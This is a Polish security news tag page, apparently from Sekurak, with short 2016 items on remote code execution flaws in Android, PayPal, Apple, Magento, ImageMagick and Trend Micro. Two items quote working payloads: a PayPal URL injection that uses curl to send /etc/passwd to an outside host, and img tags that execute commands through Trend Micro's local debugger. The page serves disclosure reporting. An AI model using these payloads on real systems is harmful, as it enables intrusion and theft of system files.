Żądny wiedzy? Wbijaj na Mega Sekurak Hacking Party w maju! -30% z kodem: majearly

Tag: rce

Google pokazuje exploita na… Androida. Zdalne wykonanie kodu przez e-mail, MMS, …

10 września 2016, 22:14 | W biegu | 1 komentarz

Tym razem mamy podatność w libutils (poziom ryzyka Critical), co oznacza zdalne wykonanie kodu w OS na potencjalnie wiele różnych sposobów (dostarczenie przez e-mail, MMS, itd). Jest też gotowy exploit, podobno dość sprawnie działający: The provided exploit performs this on several recent Android versions for the Nexus 5x; and is both reliable…

Czytaj dalej »

Node.js – wykonanie kodu w OS na serwerze Paypala

20 sierpnia 2016, 10:20 | W biegu | komentarze 3

O problemach bezpieczeństwa w node.js pisaliśmy już jakiś czas temu. Teraz świeży bug umożliwiający wykonanie kodu w os na demo.paypal.com. Tym razem udało się znaleźć problem przy okazji fuzzingu w burpie: Finalnie exploit okazał się w miarę prosty (wysłanie /etc/passwd do serwera atakującego): https://demo.paypal.com/demo/navigation?device[]=x&device[]=y’-require(’child_process’).exec(’curl+-F+”x=`cat+/etc/passwd`”+artsploit.com’)-’ –Michał Sajdak

Czytaj dalej »

Shackowali obraz na monitorze, okazało się że model Della to… tak naprawdę mini komputer

12 sierpnia 2016, 10:32 | W biegu | 0 komentarzy

Interesująca praca zaprezentowana na tegorocznym Defconie. Okazuje się, że w monitorze Della 2410U (ale potencjalnie również u innych producentów) znajduje się display controller, który de facto jest małym komputerem (z własnym firmware). W ramach PoC badacze zmienili stan konta w Paypal na $1 000 000 (de facto zmienili tylko piksele…

Czytaj dalej »

Masakra w świecie Apple – wykonanie kodu na iPhone oraz OS X – wystarczy wysłać jeden obrazek…

20 lipca 2016, 16:15 | W biegu | komentarze 2

Pamiętacie androidowy Stegefright? (wystarczyło wysłać do ofiary MMS-a aby przejąć jej telefon). Podobna podatność pojawiła się właśnie w iPhone oraz innych systemach od Apple. Wczorajszy Forbes opisuje ją jako „podatność, dzięki której jednym SMSem można ukraść hasła z iPhone„. Podatność CVE-2016-4631 czai się w API: ImageIO, które jest w każdym systemie operacyjnym Apple…

Czytaj dalej »

BadTunnel – 20 letnia podatność odkryta przez Chińczyka: od Windows XP do Windows 10

15 czerwca 2016, 18:55 | W biegu | komentarze 2

Wczoraj sypnęło podatnościami oznaczonymi parą: Critical / RCE (zdalne wykonanie kodu) w: IE, Edge, Microsoft Office, … z dokładką w postaci kilku problemów związanych z eskalacją uprawnień (np. w obsłudze WPAD). Tym razem jednak sprawa wygląda na bardziej skomplikowaną – w część podatności zamieszany jest chiński badacz, Yang Yu, który…

Czytaj dalej »

60 miliardów dolarów, Magento i nieuwierzytelnione wykonanie kodu w popularnej platformie e-commerce

18 maja 2016, 20:29 | W biegu | komentarze 2

Jeśli ktoś jeszcze nie zna platformy Magento, krótki opis ze strony Natanela Rubina, osoby która znalazła w tym popularnym systemie e-commerce, co najmniej dwie krytyczne podatności: Magento is an extremely popular eCommerce platform with a 30% share in the eCommerce market. It is used by major corporations, such as Samsung, Nike and Lenovo,…

Czytaj dalej »

ImageMagick – krytyczny błąd / wykonanie kodu przez upload 'normalnego’ obrazka – masa systemów podatna

04 maja 2016, 08:04 | W biegu | komentarze 4
ImageMagick – krytyczny błąd / wykonanie kodu przez upload 'normalnego’ obrazka – masa systemów podatna

TL;DR Błąd w ImageMagick umożliwia zdalne wykonanie kodu – wystarczy uploadowanie odpowiednio spreparowanego pliku graficznego. Są gotowe exploity, jest też niekompletny fix (na dzień 4.05.2016), a relacje środowiska są dość nerwowe a całe upublicznienie sprawy dość szybkie i momentami chaotyczne. Jako bonus (niezależnie od OS command exec) możliwe są też scenariusze: SSRF,…

Czytaj dalej »

Trend Micro Maximum Security – można wykonywać kod w OS na komputerze ofiary… szybko patchujcie

31 marca 2016, 11:46 | W biegu | 1 komentarz

Tavis – rozwalacz antywirusów – Ormandy tym razem tak napisał o trzech produktach Trend Micro: Frankly, the issue is already ridiculously easy to discover and exploit though. Tym razem chodzi o wykonanie kodu na komputerze ofiary, poprzez…odwiedzenie takiego obrazka: <img src=”http://localhost:40000/json/new/?javascript:require(’child_process’).spawnSync(’calc.exe’) <img src=”http://localhost:40001/json/new/?javascript:require(’child_process’).spawnSync(’calc.exe’) <img src=”http://localhost:40002/json/new/?javascript:require(’child_process’).spawnSync(’calc.exe’) Podatne produkty: * Trend Micro…

Czytaj dalej »

Malware wykradający numery karty kredytowych z Magento… podszywa się pod oficjalnego patcha

16 lutego 2016, 22:50 | W biegu | 1 komentarz

Rok temu wykryto krytyczną podatność (nieuwierzytelnione wykonanie kodu na systemie operacyjnym) w niezmiernie popularnym systemie klasy eCommerce – Magento: A cały czas wiele systemów jest podatna (po 2 miesiącach od wydania patcha było to około 100 000 sklepów). Co więcej – obecnie aktywny jest malware wykradający ze sklepów opartych o Magento…

Czytaj dalej »